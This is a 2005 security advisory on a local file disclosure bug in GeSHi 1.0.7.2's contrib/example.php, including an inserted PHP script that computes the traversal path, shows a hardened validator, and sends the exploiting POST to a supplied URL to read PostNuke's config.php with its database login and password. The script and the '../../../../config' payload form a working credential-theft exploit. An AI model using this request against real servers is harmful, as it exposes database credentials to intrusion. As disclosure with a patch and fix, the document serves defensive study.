-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[GeSHi Local PHP file inclusion 1.0.7.2]

Author: Maksymilian Arciemowicz ( cXIb8O3 )
Date: 21.9.2005
from SECURITYREASON.COM

- --- 0. Description ---

GeSHi started as a mod for the phpBB forum system, to enable highlighting of more languages than were available (which was 0 ;)). However, it quickly grew into an entire project of its own. Now that it has been released, work continues on a mod for phpBB - and hopefully for many forum systems, blogs and other web-based systems.

Several systems are using GeSHi now, including:

PostNuke - A popular open source CMS
DokuWiki - An advanced wiki engine
gtk.php.net - Their manual uses GeSHi for syntax highlighting
WordPress - A powerful blogging system
PHP-Fusion - A constantly evolving CMS
SQL Manager - A Postgres DBAL
Mambo - A popular open source CMS
MediaWiki - A leader in wikis
TikiWiki - A mega-powerful wiki/CMS, and one I personally use
RWeb - A site-building tool

- --- 1. Local (PHP) file inclusion ---

I have found one bug in the file ./contrib/example.php, which ships in the standard GeSHi package. Lines 10-18 of that file read:

include('../geshi.php');
if ( isset($_POST['submit']) ) {
    if ( get_magic_quotes_gpc() ) $_POST['source'] = stripslashes($_POST['source']);
    if ( !strlen(trim($_POST['source'])) ) {
        // the language name is concatenated into the path without any check
        $_POST['source'] = implode('', @file('../geshi/' . $_POST['language'] . '.php'));
        $_POST['language'] = 'php';
    }

So if $_POST['submit'] is set and $_POST['source'] is empty, the script reads '../geshi/' . $_POST['language'] . '.php' and displays its contents as highlighted PHP source. Because $_POST['language'] is never validated, you can read any PHP file on the server (for example config.php in PostNuke): put the path to the file, without the trailing .php (the script appends it), in $_POST['language'] and leave $_POST['source'] empty. Note that the file is read with file(), not include(), so the script discloses the file's source text rather than executing it.

I have tested this bug in the GeSHi package and in PostNuke 0.760 (file: ./modules/pn_bbcode/pnincludes/contrib/example.php). In PostNuke we can read config.php, which holds the database login, password, dbname and dbhost: all the variables needed to log in to the database. So we can just use the exploit below:

- --- EXPLOIT TESTED IN POSTNUKE 0.760 ---

Path to file (without the .php extension, relative to the geshi/ language directory):
example: ../../../../config

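The following script is an added example; it is not part of the advisory, of the GeSHi code base, or of the securityreason.com patch. It reproduces what contrib/example.php opens for the path given above (geshi_example_target('../../../../config') returns '../geshi/../../../../config.php', i.e. config.php four directories above the language directory), shows a hardened replacement for the unchecked concatenation, and, when given a URL on the command line, sends the POST that the advisory describes. The target URL, the language directory ../geshi, and the assumption that GeSHi language files are named <language>.php are assumptions for illustration; send the request only to hosts you are authorised to test.

```php
<?php
// Added example for this advisory. Not GeSHi's own code and not the
// securityreason.com patch; the target URL is a placeholder you supply.
// Usage: php geshi_example_check.php [http://HOST/path/to/contrib/example.php]

// 1. What example.php opens. Same expression as the vulnerable line in
//    contrib/example.php: the value is concatenated unchecked and '.php'
//    is appended, so '../' sequences walk out of ../geshi/.
function geshi_example_target($language)
{
    return '../geshi/' . $language . '.php';
}

// 2. Hardened replacement. Assumption: language files live in $langDir and
//    are named <language>.php. Only a bare name is accepted, and the
//    resolved path must stay inside $langDir.
function geshi_language_file($language, $langDir)
{
    // \z (not $) so a trailing newline cannot slip past the check
    if (!preg_match('/^[A-Za-z0-9_-]+\z/', $language)) {
        return false;                       // rejects '../', '/', NUL bytes, empty names
    }
    $base = realpath($langDir);
    $file = realpath($langDir . '/' . $language . '.php');
    if ($base === false || $file === false) {
        return false;                       // no such language file
    }
    if (strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;                       // resolved outside the language directory
    }
    return $file;
}

// 3. The request the advisory describes: submit set (any value), source
//    empty so the @file(...) branch runs, language carrying the traversal.
function fetch_via_example_php($exampleUrl, $traversal)
{
    $body = http_build_query(array(
        'submit'   => '1',
        'source'   => '',
        'language' => $traversal,
    ));
    $ctx = stream_context_create(array('http' => array(
        'method'        => 'POST',
        'header'        => "Content-Type: application/x-www-form-urlencoded\r\n",
        'content'       => $body,
        'ignore_errors' => true,            // keep the body even on a non-200 status
    )));
    return file_get_contents($exampleUrl, false, $ctx);
}

$traversal = '../../../../config';          // the path from the advisory

echo "example.php would open: ", geshi_example_target($traversal), "\n";
echo "hardened check on traversal input: ";
var_dump(geshi_language_file($traversal, '../geshi'));
echo "hardened check on a plain language name: ";
var_dump(geshi_language_file('php', '../geshi'));

if ($argc > 1) {
    // For PostNuke 0.760 the script sits at
    // http://HOST/modules/pn_bbcode/pnincludes/contrib/example.php
    $html = fetch_via_example_php($argv[1], $traversal);
    if ($html === false) {
        fwrite(STDERR, "request failed\n");
        exit(1);
    }
    // The file's source comes back inside GeSHi's highlighting markup;
    // stripping tags and decoding entities is a rough way to recover it
    // (assumption: the page contains no other text worth keeping).
    echo html_entity_decode(strip_tags($html)), "\n";
}
```

The regular expression is the part that matters: the original line trusts the request, while geshi_language_file() accepts only a bare language name and then confirms with realpath() that the resolved file is still under the language directory, so the traversal path from the advisory is rejected before any file is opened.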
- --- EXPLOIT FOR POSTNUKE 0.760 ---

[HOST] = example. http://www.securityreason.com/postnuke/html

any questions? ;]

- --- 2. How to fix ---

Patch http://securityreason.com/patch/2 works in PostNuke 0.760, or upgrade to version 1.0.7.3 of the script.

- --- 3. Greets ---

sp3x

- --- 4. Contact ---

Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDMuOr3Ke13X/fTO4RAtIPAJ9eYAoID8idUKarOBdV2ndLcy0VPgCgmvIm
MWVTap2Adcne2IMt7OpZHmM=
=JulS
-----END PGP SIGNATURE-----